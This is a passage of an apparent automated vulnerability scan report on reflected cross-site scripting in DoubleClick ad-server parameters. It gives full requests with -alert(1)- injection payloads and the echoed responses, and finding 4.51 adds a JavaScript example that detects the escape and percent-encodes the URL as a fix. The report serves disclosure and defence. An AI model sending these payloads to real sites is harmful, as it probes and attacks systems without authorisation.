GET /adj/N5364.nytimes/B5378238.13;sz=300x250;pc=nyt160964A265018;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight7bbcd'-alert(1)-'4023a71aeed&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:17:02 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6766

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:13 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
3B4307-300/250%3B41996799/42014586/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt160964A265018%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight7bbcd'-alert(1)-'4023a71aeed&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto=http://newsroom.intel.com/community/inte
...[SNIP]...

4.44. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [sn1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.13

Issue detail

The value of the sn1 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6c9dc"-alert(1)-"de026531d4a was submitted in the sn1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.13;sz=300x250;pc=nyt160964A265018;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda6c9dc"-alert(1)-"de026531d4a&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:18:13 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6766

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:13 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda6c9dc"-alert(1)-"de026531d4a&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996799;");
var fscUrl = url;
var fscUrlClickTagFound = fals
...[SNIP]...

4.45. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [sn1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.13

Issue detail

The value of the sn1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a1620'-alert(1)-'bf7a9f817b6 was submitted in the sn1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.13;sz=300x250;pc=nyt160964A265018;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cdaa1620'-alert(1)-'bf7a9f817b6&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:18:17 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6766

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:13 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cdaa1620'-alert(1)-'bf7a9f817b6&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996799;\">
...[SNIP]...

4.46. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [sn2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.13

Issue detail

The value of the sn2 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21b3d"-alert(1)-"15aabbab5ea was submitted in the sn2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.13;sz=300x250;pc=nyt160964A265018;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb21b3d"-alert(1)-"15aabbab5ea&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:17:36 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6766

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:13 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
ww.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb21b3d"-alert(1)-"15aabbab5ea&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996799
...[SNIP]...

4.47. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [sn2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.13

Issue detail

The value of the sn2 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4f2f'-alert(1)-'b6fb9d14bcc was submitted in the sn2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.13;sz=300x250;pc=nyt160964A265018;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bba4f2f'-alert(1)-'b6fb9d14bcc&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:17:40 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6766

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:13 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
ww.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bba4f2f'-alert(1)-'b6fb9d14bcc&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996799
...[SNIP]...

4.48. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [snr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.13

Issue detail

The value of the snr request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4247"-alert(1)-"8bdcaae1fe2 was submitted in the snr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.13;sz=300x250;pc=nyt160964A265018;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclickf4247"-alert(1)-"8bdcaae1fe2&snx=1305198667&sn1=ef2b314b/be015cda&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:17:48 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6766

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:13 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
dx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclickf4247"-alert(1)-"8bdcaae1fe2&snx=1305198667&sn1=ef2b314b/be015cda&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996799;");
var fscUrl
...[SNIP]...

4.49. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [snr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.13

Issue detail

The value of the snr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3263d'-alert(1)-'2764c1dfd7f was submitted in the snr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.13;sz=300x250;pc=nyt160964A265018;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick3263d'-alert(1)-'2764c1dfd7f&snx=1305198667&sn1=ef2b314b/be015cda&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:17:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6766

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:13 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
dx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick3263d'-alert(1)-'2764c1dfd7f&snx=1305198667&sn1=ef2b314b/be015cda&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996799;\">
...[SNIP]...

4.50. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [snx parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.13

Issue detail

The value of the snx request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 90a97'-alert(1)-'a16d04ed375 was submitted in the snx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.13;sz=300x250;pc=nyt160964A265018;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=130519866790a97'-alert(1)-'a16d04ed375&sn1=ef2b314b/be015cda&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:18:05 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6766

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:13 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
k.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=130519866790a97'-alert(1)-'a16d04ed375&sn1=ef2b314b/be015cda&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996799;\">
...[SNIP]...

4.51. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [snx parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.13

Issue detail

The value of the snx request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82a6c"-alert(1)-"89c361df78a was submitted in the snx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and makes XSS hard to prevent. This finding and 4.50 are a single reflection point: the same click= value is written once into the single-quoted document.write('...') literal and once into the double-quoted literal that precedes var fscUrl = url; in the response above, so each quote style breaks out of one of them. Any fix has to cover both literals, for example by percent-encoding the value before it is embedded, or by not echoing it at all.
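Findings 4.50 and 4.51 are one reflection point probed with two canaries: the click= URL is written into a single-quoted document.write('...') literal and into a double-quoted string literal, and each payload closes exactly one of them. The following added example (JavaScript, written for this report; not DoubleClick's ad-serving code) reproduces that pattern in a minimal template, scans the rendered script for alert( outside any string literal, which is the condition the scanner's "echoed unmodified into a JavaScript string" verdict rests on, and applies a fix that percent-encodes the click URL so that neither canary can close a literal. The template, the abbreviated click URL and the allowed URL alphabet are assumptions; the two canaries are the ones from the findings.

```javascript
// Added example for this report; not DoubleClick's ad-serving code.
// Models the reflection in findings 4.50/4.51: the click= URL is written into a
// single-quoted document.write('...') literal and into a double-quoted literal.

// Constructed click URL, abbreviated from the request in 4.50 (assumption).
const BASE_CLICK =
  "http://www.nytimes.com/adx/bin/adx_click.html?type=goto&snr=doubleclick&snx=1305198667&goto=";

// The scanner's canaries from 4.50 and 4.51. Each closes one kind of literal and
// is inert inside the other, which is why both variants are submitted.
const SQ_PAYLOAD = "90a97'-alert(1)-'a16d04ed375";
const DQ_PAYLOAD = '82a6c"-alert(1)-"89c361df78a';

// Hypothetical minimal template: raw concatenation into both contexts that the
// captured responses show. Vulnerable when fed the request value unchanged.
function renderTemplate(clickUrl) {
  return "document.write('<a href=\"" + clickUrl + "\">ad</a>');\n" +
         'var url = "' + clickUrl + '";\n';
}

// Percent-encode every character outside the RFC 3986 URL alphabet, and also the
// apostrophe (a legal URL sub-delimiter, but a JS and HTML delimiter). The result
// contains no quote, backslash, angle bracket, whitespace or line terminator, so
// it can close neither string literal, nor the href attribute, nor the <script>.
function sanitizeUrlForScript(url) {
  const utf8 = new TextEncoder();
  return String(url).replace(/[^A-Za-z0-9\-._~:\/?#\[\]@!$&()*+,;=%]/g, (c) =>
    Array.from(utf8.encode(c), (b) => "%" + b.toString(16).toUpperCase().padStart(2, "0")).join(""));
}

// Hardened rendering: same template, sanitised value.
function renderHardened(clickUrl) {
  return renderTemplate(sanitizeUrlForScript(clickUrl));
}

// The check behind the scanner's verdict: report the 1-based line numbers on which
// "alert(" occurs outside any ' or " string literal. Tracks quote state and
// backslash escapes; an unterminated literal ends at the newline (a JS syntax
// error anyway), so state never leaks into the next line.
function alertOutsideStrings(script) {
  const hits = [];
  let quote = null;
  let line = 1;
  for (let i = 0; i < script.length; i++) {
    const c = script[i];
    if (c === "\n") { quote = null; line++; continue; }
    if (quote !== null) {
      if (c === "\\") i++;                 // skip the escaped character
      else if (c === quote) quote = null;  // literal closed
      continue;
    }
    if (c === "'" || c === '"') { quote = c; continue; }
    if (script.startsWith("alert(", i) && !hits.includes(line)) hits.push(line);
  }
  return hits;
}

// The ' canary escapes on line 1 (document.write), the " canary on line 2
// (var url = "..."), and neither escapes after sanitisation.
console.log(
  alertOutsideStrings(renderTemplate(BASE_CLICK + SQ_PAYLOAD)),  // [ 1 ]
  alertOutsideStrings(renderTemplate(BASE_CLICK + DQ_PAYLOAD)),  // [ 2 ]
  alertOutsideStrings(renderHardened(BASE_CLICK + SQ_PAYLOAD)),  // []
  alertOutsideStrings(renderHardened(BASE_CLICK + DQ_PAYLOAD)),  // []
);
```

The sanitiser leaves a well-formed click URL untouched (letters, digits and the :/?=&. delimiters are all in the allowed set) and only rewrites the characters that can change context, so the ad server's click tracking keeps working while the scanner's canaries, and anything built along the same lines, stay inside the literal.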

Request

GET /adj/N5364.nytimes/B5378238.13;sz=300x250;pc=nyt160964A265018;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=130519866782a6c"-alert(1)-"89c361df78a&sn1=ef2b314b/be015cda&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:18:01 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6766

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:13 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
k.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=130519866782a6c"-alert(1)-"89c361df78a&sn1=ef2b314b/be015cda&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996799;");
var fscUrl = url;
var fscU
...[SNIP]...

